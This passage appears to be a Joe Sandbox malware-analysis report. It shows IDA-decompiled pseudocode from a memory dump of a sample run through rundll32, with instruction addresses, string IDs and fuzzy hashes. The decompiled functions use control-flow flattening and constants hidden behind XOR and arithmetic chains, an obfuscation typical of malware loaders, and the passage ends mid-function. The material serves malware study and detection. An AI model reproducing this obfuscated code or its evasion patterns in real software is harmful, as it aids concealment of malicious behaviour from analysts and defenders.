                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t271;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				void* _t303;
                                                                                                                      				void* _t304;
                                                                                                                      				signed int* _t307;
                                                                                                                      
                                                                                                                      				_t307 =  &_v1668;
                                                                                                                      				_v1644 = 0x34739e;
                                                                                                                      				_v1644 = _v1644 * 0x43;
                                                                                                                      				_t303 = __ecx;
                                                                                                                      				_v1644 = _v1644 >> 0xb;
                                                                                                                      				_t304 = 0x422d362;
                                                                                                                      				_t271 = 0x7d;
                                                                                                                      				_v1644 = _v1644 / _t271;
                                                                                                                      				_v1644 = _v1644 ^ 0x00084d9c;
                                                                                                                      				_v1612 = 0xb20ebf;
                                                                                                                      				_v1612 = _v1612 << 0xe;
                                                                                                                      				_v1612 = _v1612 ^ 0x83a04dde;
                                                                                                                      				_v1580 = 0xaa66ba;
                                                                                                                      				_v1580 = _v1580 + 0xffff0111;
                                                                                                                      				_v1580 = _v1580 ^ 0x00ac31ef;
                                                                                                                      				_v1604 = 0x4a91ac;
                                                                                                                      				_v1604 = _v1604 | 0x86032005;
                                                                                                                      				_v1604 = _v1604 ^ 0x86453654;
                                                                                                                      				_v1660 = 0x3cdcbf;
                                                                                                                      				_t272 = 0x34;
                                                                                                                      				_v1660 = _v1660 / _t272;
                                                                                                                      				_v1660 = _v1660 << 9;
                                                                                                                      				_t273 = 0x19;
                                                                                                                      				_v1660 = _v1660 * 0x33;
                                                                                                                      				_v1660 = _v1660 ^ 0x776ddfce;
                                                                                                                      				_v1620 = 0xfdfe87;
                                                                                                                      				_v1620 = _v1620 | 0x8debc5e9;
                                                                                                                      				_v1620 = _v1620 ^ 0x8df4241a;
                                                                                                                      				_v1596 = 0xc5e4de;
                                                                                                                      				_v1596 = _v1596 / _t273;
                                                                                                                      				_v1596 = _v1596 ^ 0x000ab9e2;
                                                                                                                      				_v1568 = 0x4c47da;
                                                                                                                      				_v1568 = _v1568 + 0x5d3c;
                                                                                                                      				_v1568 = _v1568 ^ 0x0043a9f3;
                                                                                                                      				_v1564 = 0xed5f6a;
                                                                                                                      				_t274 = 0x2a;
                                                                                                                      				_v1564 = _v1564 / _t274;
                                                                                                                      				_v1564 = _v1564 ^ 0x00049b09;
                                                                                                                      				_v1588 = 0xe27f75;
                                                                                                                      				_t275 = 0x68;
                                                                                                                      				_v1588 = _v1588 * 0x15;
                                                                                                                      				_v1588 = _v1588 ^ 0x129f57f0;
                                                                                                                      				_v1572 = 0x58913e;
                                                                                                                      				_v1572 = _v1572 + 0xffff0520;
                                                                                                                      				_v1572 = _v1572 ^ 0x005b93ab;
                                                                                                                      				_v1648 = 0xac4e73;
                                                                                                                      				_v1648 = _v1648 >> 8;
                                                                                                                      				_v1648 = _v1648 >> 0x10;
                                                                                                                      				_v1648 = _v1648 << 3;
                                                                                                                      				_v1648 = _v1648 ^ 0x000ac3bf;
                                                                                                                      				_v1668 = 0x5a6a4e;
                                                                                                                      				_t90 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t90 * 0x58;
                                                                                                                      				_t92 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t92 / _t275;
                                                                                                                      				_v1668 = _v1668 << 1;
                                                                                                                      				_v1668 = _v1668 ^ 0x009738dd;
                                                                                                                      				_v1640 = 0x7a6607;
                                                                                                                      				_t276 = 0x65;
                                                                                                                      				_v1640 = _v1640 * 0xa;
                                                                                                                      				_v1640 = _v1640 >> 9;
                                                                                                                      				_v1640 = _v1640 | 0xf246f931;
                                                                                                                      				_v1640 = _v1640 ^ 0xf242cc5d;
                                                                                                                      				_v1628 = 0xa390c8;
                                                                                                                      				_v1628 = _v1628 << 0xf;
                                                                                                                      				_v1628 = _v1628 ^ 0x3ac7d651;
                                                                                                                      				_v1628 = _v1628 ^ 0xf2afedad;
                                                                                                                      				_v1652 = 0x2d980b;
                                                                                                                      				_v1652 = _v1652 * 0x71;
                                                                                                                      				_v1652 = _v1652 * 0x17;
                                                                                                                      				_v1652 = _v1652 ^ 0x28f4da4d;
                                                                                                                      				_v1652 = _v1652 ^ 0xe6141d35;
                                                                                                                      				_v1636 = 0x37785c;
                                                                                                                      				_v1636 = _v1636 + 0xffffcffd;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b7d5c73;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b457d84;
                                                                                                                      				_v1616 = 0xb1620;
                                                                                                                      				_v1616 = _v1616 << 0x10;
                                                                                                                      				_v1616 = _v1616 ^ 0x162b8e46;
                                                                                                                      				_v1632 = 0x4c47;
                                                                                                                      				_v1632 = _v1632 + 0xffffc0f0;
                                                                                                                      				_v1632 = _v1632 + 0xffffd3bf;
                                                                                                                      				_v1632 = _v1632 ^ 0xfff44e1b;
                                                                                                                      				_v1664 = 0xa6b80c;
                                                                                                                      				_v1664 = _v1664 + 0xf763;
                                                                                                                      				_v1664 = _v1664 * 0x6e;
                                                                                                                      				_v1664 = _v1664 / _t276;
                                                                                                                      				_v1664 = _v1664 ^ 0x00b9c638;
                                                                                                                      				_v1600 = 0xaa0054;
                                                                                                                      				_v1600 = _v1600 ^ 0xf2e3595a;
                                                                                                                      				_v1600 = _v1600 ^ 0xf24e3ce3;
                                                                                                                      				_v1608 = 0x669547;
                                                                                                                      				_v1608 = _v1608 + 0xe3ee;
                                                                                                                      				_v1608 = _v1608 ^ 0x0066aeed;
                                                                                                                      				_v1656 = 0xf50b8d;
                                                                                                                      				_v1656 = _v1656 + 0xffffe5b9;
                                                                                                                      				_v1656 = _v1656 * 0x19;
                                                                                                                      				_v1656 = _v1656 * 0x2c;
                                                                                                                      				_v1656 = _v1656 ^ 0x1c789090;
                                                                                                                      				_v1576 = 0xf13773;
                                                                                                                      				_v1576 = _v1576 | 0xffe45fc0;
                                                                                                                      				_v1576 = _v1576 ^ 0xfffeb9af;
                                                                                                                      				_v1624 = 0xc714fc;
                                                                                                                      				_v1624 = _v1624 << 7;
                                                                                                                      				_v1624 = _v1624 * 0x4d;
                                                                                                                      				_v1624 = _v1624 ^ 0xf0acb0c0;
                                                                                                                      				_v1584 = 0x43b9ac;
                                                                                                                      				_v1584 = _v1584 + 0xfffff1bc;
                                                                                                                      				_v1584 = _v1584 ^ 0x004aa621;
                                                                                                                      				_v1592 = 0x5bf493;
                                                                                                                      				_t258 = _v1592 * 0x43;
                                                                                                                      				_v1592 = _t258;
                                                                                                                      				_v1592 = _v1592 ^ 0x181e9f62;
                                                                                                                      				while(_t304 != 0x2953b22) {
                                                                                                                      					if(_t304 == 0x422d362) {
                                                                                                                      						_t304 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t312 = _t304 - 0xe704baa;
                                                                                                                      						if(_t304 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t304 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E002D12A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
                                                                                                                      							 *((short*)(E002C4FA8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
                                                                                                                      							E002B8650(_v1596,  &_v520, _t312, _v1568);
                                                                                                                      							_push(_v1648);
                                                                                                                      							_push(_v1572);
                                                                                                                      							_push(0x2b183c);
                                                                                                                      							E002BE7CE(E002BAB66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
                                                                                                                      							E002BAE03(_v1616, _v1632, _v1664, _t264);
                                                                                                                      							_t276 = _v1600;
                                                                                                                      							_t258 = E002CC38F(_t276,  &_v1040, _t303, _v1608);
                                                                                                                      							_t307 =  &(_t307[0x15]);
                                                                                                                      							if(_t258 != 0) {
                                                                                                                      								_t304 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t258;
                                                                                                                      				}
                                                                                                                      				_push(_v1592);
                                                                                                                      				_push(_v1584);
                                                                                                                      				_push(_v1624);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v1576);
                                                                                                                      				_push(_t276);
                                                                                                                      				_push(0);
                                                                                                                      				_t276 = 0;
                                                                                                                      				__eflags = 0;
                                                                                                                      				_t258 = E002B9700(0, _v1656, 0);
                                                                                                                      				_t307 =  &(_t307[8]);
                                                                                                                      				_t304 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}
                                                                                                                      0x002b8ad0
                                                                                                                      0x002b8ad8
                                                                                                                      0x002b8ae0
                                                                                                                      0x002b8aed
                                                                                                                      0x002b8af6
                                                                                                                      0x002b8afa
                                                                                                                      0x002b8b02
                                                                                                                      0x002b8b0a
                                                                                                                      0x002b8b12
                                                                                                                      0x002b8b1a
                                                                                                                      0x002b8b22
                                                                                                                      0x002b8b2a
                                                                                                                      0x002b8b32
                                                                                                                      0x002b8b37
                                                                                                                      0x002b8b3f
                                                                                                                      0x002b8b47
                                                                                                                      0x002b8b4f
                                                                                                                      0x002b8b57
                                                                                                                      0x002b8b5f
                                                                                                                      0x002b8b67
                                                                                                                      0x002b8b74
                                                                                                                      0x002b8b7e
                                                                                                                      0x002b8b82
                                                                                                                      0x002b8b8a
                                                                                                                      0x002b8b92
                                                                                                                      0x002b8b9a
                                                                                                                      0x002b8ba2
                                                                                                                      0x002b8baa
                                                                                                                      0x002b8bb2
                                                                                                                      0x002b8bba
                                                                                                                      0x002b8bc2
                                                                                                                      0x002b8bcf
                                                                                                                      0x002b8bd8
                                                                                                                      0x002b8bdc
                                                                                                                      0x002b8be4
                                                                                                                      0x002b8bec
                                                                                                                      0x002b8bf4
                                                                                                                      0x002b8bfc
                                                                                                                      0x002b8c04
                                                                                                                      0x002b8c0e
                                                                                                                      0x002b8c12
                                                                                                                      0x002b8c1a
                                                                                                                      0x002b8c22
                                                                                                                      0x002b8c2a
                                                                                                                      0x002b8c32
                                                                                                                      0x002b8c3a
                                                                                                                      0x002b8c3f
                                                                                                                      0x002b8c43
                                                                                                                      0x002b8c4b
                                                                                                                      0x002b8c59
                                                                                                                      0x002b8d44
                                                                                                                      0x00000000
                                                                                                                      0x002b8c5f
                                                                                                                      0x002b8c5f
                                                                                                                      0x002b8c61
                                                                                                                      0x002b8d7e
                                                                                                                      0x002b8d7e
                                                                                                                      0x002b8d84
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b8c67
                                                                                                                      0x002b8c78
                                                                                                                      0x002b8ca5
                                                                                                                      0x002b8cac
                                                                                                                      0x002b8cb1
                                                                                                                      0x002b8cb5
                                                                                                                      0x002b8cca
                                                                                                                      0x002b8d07
                                                                                                                      0x002b8d19
                                                                                                                      0x002b8d22
                                                                                                                      0x002b8d31
                                                                                                                      0x002b8d36
                                                                                                                      0x002b8d3b
                                                                                                                      0x002b8d3d
                                                                                                                      0x00000000
                                                                                                                      0x002b8d3d
                                                                                                                      0x002b8d3b
                                                                                                                      0x002b8c61
                                                                                                                      0x002b8d94
                                                                                                                      0x002b8d94
                                                                                                                      0x002b8d4b
                                                                                                                      0x002b8d56
                                                                                                                      0x002b8d5a
                                                                                                                      0x002b8d5e
                                                                                                                      0x002b8d5f
                                                                                                                      0x002b8d61
                                                                                                                      0x002b8d6c
                                                                                                                      0x002b8d6d
                                                                                                                      0x002b8d6f
                                                                                                                      0x002b8d6f
                                                                                                                      0x002b8d71
                                                                                                                      0x002b8d76
                                                                                                                      0x002b8d79
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: 499a0ecee60bc66d7e3dea55dc7964683aacb2df158788c9d08bf5d0311fe53c
                                                                                                                      • Instruction ID: 8f12228d631e4c0957f31ab323ae0e7c1531ed8b817da2c6f98d4f5273081031
                                                                                                                      • Opcode Fuzzy Hash: 499a0ecee60bc66d7e3dea55dc7964683aacb2df158788c9d08bf5d0311fe53c
                                                                                                                      • Instruction Fuzzy Hash: 6BC100724083419FC368CF25C58A94BFBE5FBC4748F008A1EF5A99A260D7B59A19CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002B70ED() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _t202;
                                                                                                                      				signed int _t203;
                                                                                                                      				void* _t204;
                                                                                                                      				intOrPtr _t209;
                                                                                                                      				intOrPtr _t216;
                                                                                                                      				void* _t218;
                                                                                                                      				intOrPtr _t224;
                                                                                                                      				intOrPtr _t236;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				void* _t246;
                                                                                                                      				signed int* _t248;
                                                                                                                      				void* _t251;
                                                                                                                      
                                                                                                                      				_t248 =  &_v612;
                                                                                                                      				_v540 = 0xdad4cc;
                                                                                                                      				_v540 = _v540 ^ 0x94191629;
                                                                                                                      				_t218 = 0x6f2f9f8;
                                                                                                                      				_v540 = _v540 ^ 0x94c3c2f9;
                                                                                                                      				_v544 = 0x76e0f0;
                                                                                                                      				_v544 = _v544 << 0x10;
                                                                                                                      				_v544 = _v544 ^ 0xe0f00029;
                                                                                                                      				_v536 = 0x3bc67a;
                                                                                                                      				_v536 = _v536 >> 0xc;
                                                                                                                      				_v536 = _v536 ^ 0x000f0383;
                                                                                                                      				_v568 = 0x8bde3b;
                                                                                                                      				_v568 = _v568 + 0xffff2322;
                                                                                                                      				_v568 = _v568 ^ 0x008d993e;
                                                                                                                      				_v596 = 0x92619;
                                                                                                                      				_v596 = _v596 ^ 0xd159791b;
                                                                                                                      				_v596 = _v596 + 0xffff3449;
                                                                                                                      				_v596 = _v596 | 0x988058a4;
                                                                                                                      				_v596 = _v596 ^ 0xd9ccc0e1;
                                                                                                                      				_v608 = 0xa06713;
                                                                                                                      				_t241 = 0x29;
                                                                                                                      				_v608 = _v608 / _t241;
                                                                                                                      				_v608 = _v608 ^ 0x6a345d45;
                                                                                                                      				_t246 = 0;
                                                                                                                      				_v608 = _v608 << 0xe;
                                                                                                                      				_v608 = _v608 ^ 0xed3298df;
                                                                                                                      				_v576 = 0x1c835f;
                                                                                                                      				_v576 = _v576 ^ 0xdf607740;
                                                                                                                      				_v576 = _v576 >> 0xb;
                                                                                                                      				_v576 = _v576 ^ 0x0012ec93;
                                                                                                                      				_v584 = 0x7ddda5;
                                                                                                                      				_t242 = 0x76;
                                                                                                                      				_v584 = _v584 / _t242;
                                                                                                                      				_v584 = _v584 | 0x464a7126;
                                                                                                                      				_v584 = _v584 ^ 0x4642215f;
                                                                                                                      				_v548 = 0x20374d;
                                                                                                                      				_t243 = 0x71;
                                                                                                                      				_v548 = _v548 * 0x6c;
                                                                                                                      				_v548 = _v548 ^ 0x0d9d239d;
                                                                                                                      				_v528 = 0x9116;
                                                                                                                      				_v528 = _v528 ^ 0x0b2a50da;
                                                                                                                      				_v528 = _v528 ^ 0x0b2b7a92;
                                                                                                                      				_v600 = 0xee9b3a;
                                                                                                                      				_v600 = _v600 | 0x1ae7cac3;
                                                                                                                      				_v600 = _v600 + 0x2aec;
                                                                                                                      				_v600 = _v600 | 0xe5d5fb71;
                                                                                                                      				_v600 = _v600 ^ 0xfffe899a;
                                                                                                                      				_v556 = 0x2fd7b1;
                                                                                                                      				_v556 = _v556 / _t243;
                                                                                                                      				_v556 = _v556 ^ 0x0001ae08;
                                                                                                                      				_v552 = 0xd06bd7;
                                                                                                                      				_v552 = _v552 + 0x9aba;
                                                                                                                      				_v552 = _v552 ^ 0x00dba68b;
                                                                                                                      				_v560 = 0x3f6698;
                                                                                                                      				_v560 = _v560 ^ 0x9e976c20;
                                                                                                                      				_v560 = _v560 ^ 0x9ea088a0;
                                                                                                                      				_v564 = 0xf04caf;
                                                                                                                      				_v564 = _v564 << 0xc;
                                                                                                                      				_v564 = _v564 ^ 0x04c86801;
                                                                                                                      				_v532 = 0x4abe1e;
                                                                                                                      				_v532 = _v532 + 0xffff7e54;
                                                                                                                      				_v532 = _v532 ^ 0x0047677c;
                                                                                                                      				_v592 = 0xfc3d76;
                                                                                                                      				_v592 = _v592 >> 4;
                                                                                                                      				_t244 = 0x67;
                                                                                                                      				_t245 = _v524;
                                                                                                                      				_v592 = _v592 / _t244;
                                                                                                                      				_v592 = _v592 ^ 0x0e63bcd1;
                                                                                                                      				_v592 = _v592 ^ 0x0e6c0c0a;
                                                                                                                      				_v580 = 0x87074e;
                                                                                                                      				_v580 = _v580 + 0x3b8f;
                                                                                                                      				_v580 = _v580 + 0xffffa265;
                                                                                                                      				_v580 = _v580 ^ 0x008cb1a6;
                                                                                                                      				_v588 = 0xe717aa;
                                                                                                                      				_v588 = _v588 | 0xfff18f7b;
                                                                                                                      				_v588 = _v588 >> 0xb;
                                                                                                                      				_v588 = _v588 ^ 0x001226f1;
                                                                                                                      				_v604 = 0x61f630;
                                                                                                                      				_v604 = _v604 | 0xec5f2186;
                                                                                                                      				_v604 = _v604 ^ 0x97c62f9e;
                                                                                                                      				_v604 = _v604 ^ 0x80f94e8c;
                                                                                                                      				_v604 = _v604 ^ 0xfb4d53d4;
                                                                                                                      				_v612 = 0x890e92;
                                                                                                                      				_v612 = _v612 >> 9;
                                                                                                                      				_v612 = _v612 + 0xf9d4;
                                                                                                                      				_v612 = _v612 + 0xffff7e3c;
                                                                                                                      				_v612 = _v612 ^ 0x000167a4;
                                                                                                                      				_v572 = 0xa3f922;
                                                                                                                      				_v572 = _v572 << 1;
                                                                                                                      				_v572 = _v572 + 0x9b39;
                                                                                                                      				_v572 = _v572 ^ 0x014464a5;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t251 = _t218 - 0xaf66d96;
                                                                                                                      						if(_t251 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t251 == 0) {
                                                                                                                      							_push(_t218);
                                                                                                                      							_t236 =  *0x2d520c; // 0x0
                                                                                                                      							_t203 = E002BEA7B(_t236 + 8, _v552, _v524, _t218, _v560, _v564, _v532);
                                                                                                                      							_t248 =  &(_t248[7]);
                                                                                                                      							_t218 = 0xbcbad55;
                                                                                                                      							__eflags = _t203;
                                                                                                                      							_t204 = 1;
                                                                                                                      							_t246 =  ==  ? _t204 : _t246;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x1700698) {
                                                                                                                      							E002CE689(_v548, _v528, _v600, _t245, _v556);
                                                                                                                      							_t248 =  &(_t248[3]);
                                                                                                                      							L9:
                                                                                                                      							_t218 = 0xaf66d96;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x4f7449d) {
                                                                                                                      							_v524 = _v540;
                                                                                                                      							goto L9;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x51416c3) {
                                                                                                                      							E002D12A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
                                                                                                                      							_t209 = E002B7677( &_v520, _v604, _v612, _v572);
                                                                                                                      							_t224 =  *0x2d520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t224 + 4)) = _t209;
                                                                                                                      							L23:
                                                                                                                      							return _t246;
                                                                                                                      						}
                                                                                                                      						if(_t218 != 0x6f2f9f8) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						_push(_t218);
                                                                                                                      						_push(_t218);
                                                                                                                      						 *0x2d520c = E002C3512(0x444);
                                                                                                                      						_t218 = 0xcc58939;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xbcbad55;
                                                                                                                      					if(_t218 == 0xbcbad55) {
                                                                                                                      						E002BE86A();
                                                                                                                      						_t218 = 0x51416c3;
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xcc58939;
                                                                                                                      					if(_t218 == 0xcc58939) {
                                                                                                                      						_t202 = E002BEB36(_v576, _v584, _t218, _v536);
                                                                                                                      						_t245 = _t202;
                                                                                                                      						_t248 =  &(_t248[3]);
                                                                                                                      						__eflags = _t202;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t218 = 0x4f7449d;
                                                                                                                      						} else {
                                                                                                                      							_t216 =  *0x2d520c; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t216 + 0x438)) = 1;
                                                                                                                      							_t218 = 0xdbc7fda;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xdbc7fda;
                                                                                                                      					if(__eflags != 0) {
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					_t218 = 0x1700698;
                                                                                                                      					_v524 = _v544;
                                                                                                                      					goto L1;
                                                                                                                      					L20:
                                                                                                                      					__eflags = _t218 - 0xee3620e;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L23;
                                                                                                                      			}










































                                                                                                                      0x002b7490
                                                                                                                      0x002b7495
                                                                                                                      0x002b7497
                                                                                                                      0x002b749a
                                                                                                                      0x002b749c
                                                                                                                      0x002b74b6
                                                                                                                      0x002b749e
                                                                                                                      0x002b749e
                                                                                                                      0x002b74a6
                                                                                                                      0x002b74ac
                                                                                                                      0x002b74ac
                                                                                                                      0x00000000
                                                                                                                      0x002b749c
                                                                                                                      0x002b7469
                                                                                                                      0x002b746f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002b7475
                                                                                                                      0x002b747a
                                                                                                                      0x00000000
                                                                                                                      0x002b74c7
                                                                                                                      0x002b74c7
                                                                                                                      0x002b74c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: fcfa03accf3d88584f1528a28b7a9071c010fb7d31a9c24e35ddf28cb198b838
                                                                                                                      • Instruction ID: 9ead860e971d484dce6d88550e31fbab2d7cacdd03259a0f19a3f1539143978a
                                                                                                                      • Opcode Fuzzy Hash: fcfa03accf3d88584f1528a28b7a9071c010fb7d31a9c24e35ddf28cb198b838
                                                                                                                      • Instruction Fuzzy Hash: C2A120B152C3819FD768CF24D48A85BBBF1FBC5398F20891DF69686260C3B18959CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E002C5040(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t224;
                                                                                                                      				void* _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t262;
                                                                                                                      				signed int* _t264;
                                                                                                                      				signed int* _t265;
                                                                                                                      
                                                                                                                      				_t264 =  &_v80;
                                                                                                                      				_v64 = 0xca2d1a;
                                                                                                                      				_v64 = _v64 + 0xffff463a;
                                                                                                                      				_v64 = _v64 + 0xffffa2b5;
                                                                                                                      				_v64 = _v64 + 0xffffe441;
                                                                                                                      				_v64 = _v64 ^ 0x00ce8887;
                                                                                                                      				_v68 = 0xe757b6;
                                                                                                                      				_t261 = __edx;
                                                                                                                      				_t227 = __ecx;
                                                                                                                      				_t262 = 0xd46e588;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 | 0x2f3c6c23;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0xe7b70971;
                                                                                                                      				_v72 = 0xa66d67;
                                                                                                                      				_v72 = _v72 + 0xffff9e81;
                                                                                                                      				_v72 = _v72 + 0xffffa01d;
                                                                                                                      				_v72 = _v72 + 0xd858;
                                                                                                                      				_v72 = _v72 ^ 0x00aeb203;
                                                                                                                      				_v76 = 0xda65d9;
                                                                                                                      				_v76 = _v76 | 0x06c15440;
                                                                                                                      				_v76 = _v76 + 0x3ac0;
                                                                                                                      				_t230 = 0x31;
                                                                                                                      				_v76 = _v76 * 0x17;
                                                                                                                      				_v76 = _v76 ^ 0x9dbea6d5;
                                                                                                                      				_v28 = 0xef7021;
                                                                                                                      				_v28 = _v28 + 0xc1df;
                                                                                                                      				_v28 = _v28 ^ 0x38dac4ec;
                                                                                                                      				_v28 = _v28 ^ 0x38291ca9;
                                                                                                                      				_v56 = 0xd77e5;
                                                                                                                      				_v56 = _v56 | 0x9f6ff94e;
                                                                                                                      				_v56 = _v56 / _t230;
                                                                                                                      				_v56 = _v56 ^ 0x034debba;
                                                                                                                      				_v32 = 0x5c0433;
                                                                                                                      				_t231 = 0x4c;
                                                                                                                      				_v32 = _v32 / _t231;
                                                                                                                      				_t232 = 0x38;
                                                                                                                      				_v32 = _v32 * 9;
                                                                                                                      				_v32 = _v32 ^ 0x000ec3b0;
                                                                                                                      				_v60 = 0x6ca766;
                                                                                                                      				_v60 = _v60 + 0x1f13;
                                                                                                                      				_v60 = _v60 * 0x1b;
                                                                                                                      				_v60 = _v60 << 0xb;
                                                                                                                      				_v60 = _v60 ^ 0xc778512f;
                                                                                                                      				_v12 = 0x6aa94;
                                                                                                                      				_v12 = _v12 + 0x5212;
                                                                                                                      				_v12 = _v12 ^ 0x000734b5;
                                                                                                                      				_v48 = 0xd6268c;
                                                                                                                      				_v48 = _v48 / _t232;
                                                                                                                      				_t233 = 0x26;
                                                                                                                      				_v48 = _v48 / _t233;
                                                                                                                      				_v48 = _v48 + 0x646;
